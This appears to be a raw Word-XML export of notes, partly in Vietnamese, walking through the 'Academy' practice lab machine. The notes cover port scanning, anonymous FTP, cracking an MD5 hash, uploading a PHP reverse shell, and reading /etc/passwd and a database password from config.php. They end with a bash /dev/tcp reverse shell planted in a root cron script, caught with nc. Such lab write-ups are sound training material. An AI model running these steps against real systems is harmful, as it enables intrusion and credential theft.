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74FF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Academy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Tuesday, August 2, 2022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9:54 AM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-A -p- -T4 192.168.1.8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7.92 (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) at 2022-08-02 03:27 EDT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192.168.1.8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(0.00049s latency).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65532 closed tcp ports (conn-refused)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 STATE SERVICE VERSION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21/tcp open  ftp     vsftpd 3.0.3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ftp-anon: Anonymous FTP login allowed (FTP code 230)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|_-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt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ftp-syst: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STAT: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FTP server status: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Connected to ::ffff:192.168.1.6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Logged in as ftp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TYPE: ASCII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No session bandwidth limit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Session timeout in seconds is 300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Control connection is plain text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     Data connections will be plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>text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At session startup, client count was 3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vsFTPd 3.0.3 - secure, fast, stable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|_End of status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 open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)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ssh-hostkey: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  2048 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)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256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)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256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)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open  http    Apache httpd 2.4.38 ((Debian))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Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2 Debian Default Page: It works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Apache/2.4.38 (Debian)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Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel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Service detection performed. Please report any incorrect results at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</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>://nmap.org/submit/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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done: 1 IP address (1 host up) scanned in 10.78 seconds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 192.168.1.8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Connected to 192.168.1.8.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220 (vsFTPd 3.0.3)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(192.168.1.8:kali): anonymous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331 Please specify the password.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Password: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230 Login successful.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Remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> system type is UNIX.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binary mode to transfer files.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ls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229 Entering Extended Passive Mode (|||28420|)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150 Here comes the directory listing.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-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt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226 Directory send OK.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ftp&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>get note.txt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local: note.txt remote: note.txt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229 Entering Extended Passive Mode (|||5506|)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150 Opening BINARY mode data connection for note.txt (776 bytes).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100% |**********************************************************************|   776        1.23 Mi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B/s    00:00 ETA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226 Transfer complete.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776 bytes received in 00:00 (492.72 KiB/s)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note.txt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Hello Heath !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 has setup the test website for the new academy.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told him not to use the same password everywhere, he will change it ASAP.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co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uldn't create a user via the admin panel, so instead I inserted directly into the database with the following command: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`students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a`, `creationdate`, `updationDate`) VALUES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('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');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StudentRegno number is what you use for login.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 me know what you think of this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>open-source project, it's from 2020 so it should be secure... right ?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can always adapt it to our needs.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-jdelta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hash-identifier cd73502828457d15655bbd7a63fb0bc8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md5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hashcat -m 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash.txt /usr/share/wordlists/rockyou.txt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cd73502828457d15655bbd7a63fb0bc8:student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dirb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http://192.168.1.8</w:t>
        </w:r>
      </w:hyperlink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ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u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http://192.168.1.8/FUZZ</w:t>
        </w:r>
      </w:hyperlink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academy                 [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 0ms]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phpmyadmin              [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 4ms]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[Status: 200, Siz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e: 10701, Words: 3427, Lines: 369, Duration: 6ms]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server-status           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 7ms]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login to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http://192.168.1.8/academy/my-profile.php</w:t>
        </w:r>
      </w:hyperlink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 in note.txt: 10201321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pass: student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 upload avatar form.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php serverse shell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linpeas to enum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python3 -m http.server 80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wget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http://192.168.1.6/linpeas.sh</w:t>
        </w:r>
      </w:hyperlink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--2022-08-02 04:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">16:12-- 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http://192.168.1.6/linpeas.sh</w:t>
        </w:r>
      </w:hyperlink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Connecting to 192.168.1.6:80... connected.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request sent, awaiting response... 200 OK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Length: 807167 (788K) [text/x-sh]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Saving to: 'linpeas.sh'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chmod +x linpeas.sh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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./linpeas.sh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some interested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* * * * /home/grimmie/backup.sh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cat /etc/passwd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root:x:0:0:root:/root:/bin/bash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daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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bin:x:2:2:bin:/bin:/usr/sbin/nologin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sys:x:3:3:sys:/dev:/usr/sbin/nologin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sync:x:4:65534:sync:/bin:/bin/sync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games:x:5:60:games:/usr/games:/usr/sbin/nologin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man:x:6:12:man:/var/cache/man:/usr/sbin/nologin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lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin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mail:x:8:8:mail:/var/mail:/usr/sbin/nologin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news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</w:t>
        </w:r>
      </w:hyperlink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uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin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proxy:x:13:13:proxy:/bin:/usr/sbin/nologin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www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin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backup:x:34:34:backup:/var/b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ackups:/usr/sbin/nologin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list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin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irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin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gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin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nobody:x:65534:65534:nobody:/nonexiste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nt:/usr/sbin/nologin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_apt:x:100:65534::/nonexistent:/usr/sbin/nologin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systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin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systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin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systemd-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>esolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin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messagebus:x:104:110::/nonexistent:/usr/sbin/nologin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sshd:x:105:65534::/run/sshd:/usr/sbin/nologin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systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin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mysql:x:106:113:MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Server,,,:/nonexistent:/bin/false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ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin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grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash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cat /var/www/html/academy/includes/config.php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&lt;?php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$mysql_hostname = "localhost";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$mysql_user = "grimmie";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$mysql_password = "My_V3ryS3cur3_P4ss";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$mysql_database = "onlinecourse";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$bd = mysqli_connect($mysql_hostname, $mysql_user, $mysql_password, $mysql_database) or die("Could not connect database");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 to grimmie:My_V3ryS3cur3_P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4ss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sudo -l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-bash: sudo: command not found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history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1  ls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2  pwd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3  nano backup.sh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4  whoami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5  sudo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6  sudo -l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7  history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cd /home/grimmie/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cat backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.sh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#!/bin/bash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 /tmp/backup.zip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zip -r /tmp/backup.zip /var/www/html/academy/includes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chmod 700 /tmp/backup.zip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crontab -l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crontab for grimmie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crontab -u root -l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must be privileged to use -u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crontab -e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crontab for grimmie - using an empty one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an editor.  To change later, run 'select-editor'.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1. /bin/nano        &lt;---- easiest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2. /usr/bin/vim.tiny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Choose 1-2 [1]: 1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modification made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syst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emctl list-timers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                        LEFT          LAST                         PASSED       UNIT                         AC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Tue 2022-08-02 05:09:00 EDT  8min left     Tue 2022-08-02 04:39:01 EDT  21min ago    phpsessionclean.timer        ph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Tue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2022-08-02 06:41:35 EDT  1h 40min left Tue 2022-08-02 03:18:52 EDT  1h 42min ago apt-daily-upgrade.timer      ap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Tue 2022-08-02 06:48:12 EDT  1h 47min left Tue 2022-08-02 03:18:52 EDT  1h 42min ago apt-daily.timer              ap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Wed 2022-08-03 00:00:00 ED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>T  18h left      Tue 2022-08-02 03:18:52 EDT  1h 42min ago logrotate.timer              lo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Wed 2022-08-03 00:00:00 EDT  18h left      Tue 2022-08-02 03:18:52 EDT  1h 42min ago man-db.timer                 ma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Wed 2022-08-03 03:33:56 EDT  22h left      Tue 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>022-08-02 03:33:56 EDT  1h 27min ago systemd-tmpfiles-clean.timer sy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timers listed.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 --all to see loaded but inactive timers, too.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ps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PID TTY          TIME CMD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13778 pts/0    00:00:00 bash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14105 pts/0    00:00:00 ps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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cademy:~$ wget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http://192.168.1.6/pspy64</w:t>
        </w:r>
      </w:hyperlink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--2022-08-02 05:04:05-- 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http://192.168.1.6/pspy64</w:t>
        </w:r>
      </w:hyperlink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Connecting to 192.168.1.6:80... connected.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HTTP request sent, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>awaiting response... 200 OK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Length: 3078592 (2.9M) [application/octet-stream]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Saving to: ‘pspy64’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pspy64                       100%[==============================================&gt;]   2.94M  --.-KB/s    in 0.05s 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2022-08-02 05:04:05 (64.8 MB/s) - ‘pspy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>64’ saved [3078592/3078592]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chmod +x pspy64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pspy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2022/08/02 05:07:01 CMD: UID=0    PID=14166  | /bin/sh -c /home/grimmie/backup.sh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2022/08/02 05:07:01 CMD: UID=0    PID=14167  | /bin/bash /home/grimmie/backup.sh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backup đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ư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c 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o cronjob ch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y hàng phút, đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ồ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ng th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>i thay v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i sh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bây gi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 xml:space="preserve"> s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>a file backup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o reverse shell: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 -i &gt;&amp; /dev/tcp/192.168.1.6/8080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trên máy t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n công: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nc -nvlp 8081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root@academy:~#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flag.txt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Congratz you rooted this box !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Looks like this CMS isn't so secure...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hope you enjoyed it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00174F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you had any issue please let us know in the course discord.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F4"/>
    <w:rsid w:val="001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D50F6-EBBD-4F33-919E-541BFE03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8/academy/my-profile.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.6/pspy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.8/FUZZ" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.6/pspy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8" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/submi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92.168.1.6/linpeas.sh" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.6/linpeas.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2023-06-13T06:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T06:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>